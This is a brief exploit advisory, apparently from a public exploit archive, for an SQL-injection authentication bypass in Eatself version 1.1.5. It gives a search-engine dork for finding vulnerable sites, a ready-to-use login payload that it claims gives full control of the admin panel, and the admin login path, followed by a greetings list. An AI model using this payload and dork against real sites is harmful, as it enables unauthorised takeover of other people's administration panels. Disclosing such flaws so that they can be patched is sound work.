Eatself 1.1.5 SQL Injection

Eatself version 1.1.5 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


SHA-256 | f4fa31a0d3106d8c1adb588bd047ea6ff13bd2f69bed2e503589be0b1ec5678a

====================================================================================================================================
| # Title : Eatself v1.1.5 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://eatself.com/ |
| # Dork : " © Eatself. Tous droits réservés - v1.1.5." |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : user : 'or''='@gmail.com& Pass : 'or''=' (toltal control of admin panel )

[+] https://127.0.0.1/app.eatself/admin-login


Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

Related Posts